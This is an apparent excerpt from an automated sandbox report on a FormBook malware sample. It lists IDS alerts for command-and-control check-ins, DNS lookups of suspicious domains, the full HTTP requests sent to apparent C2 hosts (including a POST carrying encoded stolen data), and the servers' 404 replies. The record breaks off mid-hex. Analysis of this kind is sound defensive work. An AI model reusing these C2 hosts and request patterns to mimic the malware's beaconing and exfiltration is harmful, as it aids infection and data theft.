            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:58797 -> 202.87.223.248:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:58811 -> 221.128.225.57:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:58815 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:58786 -> 65.21.196.90:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:58786 -> 65.21.196.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:58800 -> 217.160.0.158:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:58781 -> 203.161.41.205:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:58803 -> 217.160.0.158:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:58803 -> 217.160.0.158:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:58812 -> 221.128.225.57:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:58812 -> 221.128.225.57:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.030002837.xyz
            Source: DNS query: www.restobarbebek.xyz
            Source: DNS query: www.rtpterbaruwaktu3.xyz
            Source: Joe Sandbox ViewIP Address: 172.191.244.62 172.191.244.62
            Source: Joe Sandbox ViewIP Address: 65.21.196.90 65.21.196.90
            Source: Joe Sandbox ViewASN Name: ATT-INTERNET4US ATT-INTERNET4US
            Source: Joe Sandbox ViewASN Name: LGDACOMLGDACOMCorporationKR LGDACOMLGDACOMCorporationKR
            Source: Joe Sandbox ViewASN Name: CP-ASDE CP-ASDE
            Source: Joe Sandbox ViewASN Name: OCENET-AS-APOCESdnBhdISPMY OCENET-AS-APOCESdnBhdISPMY
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /u1fq/?YDT4P=4xd8DzO&9jtPKX=8UziavWSK51wGh0yfoTPy09mw+AH3TZF6FMeVKjGe1eDtK62tODY8LE6LrUWxP2eUghCVKFR11/7ghpDkFpQ+ayhRkiuH+sQiiZHhsOmXN2fYM4UxJmKdMp/tZGxM5I0WcTc5ok= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.dguy4youguys.wtfConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
            Source: global trafficHTTP traffic detected: GET /chjf/?9jtPKX=XAGDPb2hYSNA1G205B9yTUGnAX8dO+7zB1cLVHckxJo5ahU/aASovO/kl86KK2t3BQ9RD7nwrojXFmbxG19h+PHx3PeB45qZXKA/WsiIO1RcOY79PupkSKjjj5g2/+z2ZvrlzLs=&YDT4P=4xd8DzO HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.8zu934.vipConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
            Source: global trafficHTTP traffic detected: GET /pzb3/?YDT4P=4xd8DzO&9jtPKX=cGw2exDyh1KVkWsHkX4xj4lgVlPPukG30+Eeh6IH5uNyYRC1xGnnB8QFExEpiTL5bcBgsA98LG9yqfxBLyBILpDqP6cmLzlnqu2CIAVnl8NdZZMCWNNFkUmCCHKhOgovLr644XM= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.tophfy.infoConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
            Source: global trafficHTTP traffic detected: GET /zl45/?9jtPKX=n8oXMK/zoXm+9Sf+Cf+3HqD48reH4J6cLbqP6V+sjhkAIyrgNn1URxDPpIGDIxJivz/4HVO+PmZpgKq+kRyFpOwr2F+KRn2bmC2fKgazXZTeNyaA5M+5Xps7rgsZqfJ/BnEswgE=&YDT4P=4xd8DzO HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.030002837.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
            Source: global trafficHTTP traffic detected: GET /6a3e/?9jtPKX=BZZMppAtEsJZC+SCGnDJwYc0a7P3I2XUnV0yTl1cw/B5eiAAMyS7zeU40ykuIimpo83S7m3PRw3Wl4+UmttGxit0iCQT0nNXqtGO1eivbt9K3y3Fy6qkJMw6sxrg0uoowV+p4EU=&YDT4P=4xd8DzO HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.x4wrqqc2tn.sbsConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
            Source: global trafficHTTP traffic detected: GET /ecky/?9jtPKX=E8yFMNT5NJgwX+ypl/nybltVULshlwvllIqWYsZuB87EHRd+pdJnIfFxHoxvfPrOXGrS+SNOBaUo3+/x93yIjDBeJAA65d0dctOoKHWlJneMt2c+UnLgAV484ZeCTpIzlpd+zvA=&YDT4P=4xd8DzO HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.it9.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
            Source: global trafficHTTP traffic detected: GET /huyu/?9jtPKX=6Z1wBk7RYwBPGlswbf+1K+rZouoL6hxCsE01bzPZVmnRPi6w4QFoc0Kr9wwe5SYV2Krnjruyq1yW2kXKM8ywVSDOHER5s93YVzLABz8XusiexAKM+GOGLDXayUXcrjkYWYPbXVo=&YDT4P=4xd8DzO HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.18kwatch.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
            Source: global trafficHTTP traffic detected: GET /ojw7/?9jtPKX=Oep6mOdcbJS8M33gn6lJDCgdhZprpWT1xYap2DCm99RWzR/+rod5DkimcY1te6tRP4YAPOidnC7q9fyBbp+p4w7BxYlfBAVSQr378a/zqULvDaURYind12ZcUgt4zzVfKlFhbII=&YDT4P=4xd8DzO HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.accupower.techConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
            Source: global trafficHTTP traffic detected: GET /ym4w/?YDT4P=4xd8DzO&9jtPKX=LS2dTmeF3OBn8G1tQUmCXYTIgtzicGlzjT2aVYBBrxZqGpjDVT9zDZ74on3XL6wvhAoqbJrICZyPh8boIihM0FmnY1HfyNJnnrRiM85d/p0/MDPjGflqx28U0PmHY+963/VActc= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.restobarbebek.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
            Source: global trafficHTTP traffic detected: GET /84h5/?9jtPKX=m90qfEx2Waj4M3qzKISaRwMNBxrGGJIjHL8e3ySRPK8oLcpI6mSZixZy+bRbuIjP1deJ2nKHD1dx+QvwZSZ/OQME4y6EqRE6EL+tH5CvtKetzx16bnZNcksA/ftcr1t/EGD4XGU=&YDT4P=4xd8DzO HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.cqghwamc.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
            Source: global trafficHTTP traffic detected: GET /k9l7/?9jtPKX=iU7xlsxzkrYOaJ03UWKIE/axiGr8zrmLGOQkbwAH5ClgHUe+YliICefp5kzZp7Bcmm3TqloUqqhUnmvDpapz/R4DhNtLZW/YFSxpez1iYQ5aBHFQdfaf/M2d0rHEzcblh7f2Iqc=&YDT4P=4xd8DzO HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.yesonkoicasino.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
            Source: global trafficHTTP traffic detected: GET /v6un/?9jtPKX=chrVZ32YOFiHcRt+pEb6q26+CAONXtiHqnqOnPUfdfA3+GbGusUCqNq3OHoqQeyHuv1nxnx1V1BB8mdZJamKpk9z9Ox4e3tyzXPmXAU3O+O4NKGvlCfVuqLBbErpx4XOfLWdLVU=&YDT4P=4xd8DzO HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.rtpterbaruwaktu3.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
            Source: global trafficHTTP traffic detected: GET /zeyp/?9jtPKX=Qp4X+LIjfewVnP6Y/skPG2AcibCDaQ9iuVCW0N7JhhnFM66mIUNO5YOiETDrAwi/zOtbLxRIZ8WmNUxfXqqXG7p6mEX8KWQILlPapVZ7FdK1llaTtR9WIeGVSAX1maOrISYOTkE=&YDT4P=4xd8DzO HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.mondayigboleague.infoConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
            Source: global trafficDNS traffic detected: DNS query: www.dguy4youguys.wtf
            Source: global trafficDNS traffic detected: DNS query: www.8zu934.vip
            Source: global trafficDNS traffic detected: DNS query: www.tophfy.info
            Source: global trafficDNS traffic detected: DNS query: www.030002837.xyz
            Source: global trafficDNS traffic detected: DNS query: www.x4wrqqc2tn.sbs
            Source: global trafficDNS traffic detected: DNS query: www.it9.shop
            Source: global trafficDNS traffic detected: DNS query: www.18kwatch.com
            Source: global trafficDNS traffic detected: DNS query: www.accupower.tech
            Source: global trafficDNS traffic detected: DNS query: www.restobarbebek.xyz
            Source: global trafficDNS traffic detected: DNS query: www.cqghwamc.top
            Source: global trafficDNS traffic detected: DNS query: www.yesonkoicasino.net
            Source: global trafficDNS traffic detected: DNS query: www.rtpterbaruwaktu3.xyz
            Source: global trafficDNS traffic detected: DNS query: www.mondayigboleague.info
            Source: unknownHTTP traffic detected: POST /chjf/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.8zu934.vipOrigin: http://www.8zu934.vipReferer: http://www.8zu934.vip/chjf/Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 211User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0Data Raw: 39 6a 74 50 4b 58 3d 61 43 75 6a 4d 73 61 36 51 67 42 6f 33 6b 36 56 31 51 70 6a 63 41 57 4c 62 48 41 5a 61 4a 6d 46 4b 6d 59 79 58 47 4a 50 68 4a 4e 46 44 52 4d 4b 62 68 36 31 76 73 72 42 74 73 32 6d 4a 6e 63 54 4b 69 35 36 4a 6f 6a 73 6b 35 4c 65 61 43 4c 4c 42 53 31 35 6a 65 33 74 78 74 69 44 77 49 4f 45 52 34 59 64 5a 65 61 71 50 33 68 76 4e 49 7a 4a 43 2b 55 4f 44 4c 54 67 36 6f 6f 2b 32 76 76 75 63 50 2f 44 37 39 78 74 73 34 4c 57 77 49 57 53 56 57 30 35 4e 62 46 72 38 4d 57 63 44 52 7a 33 49 39 32 6f 63 34 50 49 75 49 47 61 54 30 76 32 49 54 76 47 5a 71 6e 6e 65 42 75 4a 48 53 7a 62 6d 57 58 4e 50 53 66 32 42 66 79 4b Data Ascii: 9jtPKX=aCujMsa6QgBo3k6V1QpjcAWLbHAZaJmFKmYyXGJPhJNFDRMKbh61vsrBts2mJncTKi56Jojsk5LeaCLLBS15je3txtiDwIOER4YdZeaqP3hvNIzJC+UODLTg6oo+2vvucP/D79xts4LWwIWSVW05NbFr8MWcDRz3I92oc4PIuIGaT0v2ITvGZqnneBuJHSzbmWXNPSf2BfyK
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Mon, 30 Sep 2024 08:41:53 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 08:42:22 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 08:42:25 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 08:42:28 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 08:42:30 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 08:43:25 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 65 63 6b 79 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ecky/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 08:43:27 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 65 63 6b 79 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ecky/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 08:43:30 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 65 63 6b 79 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 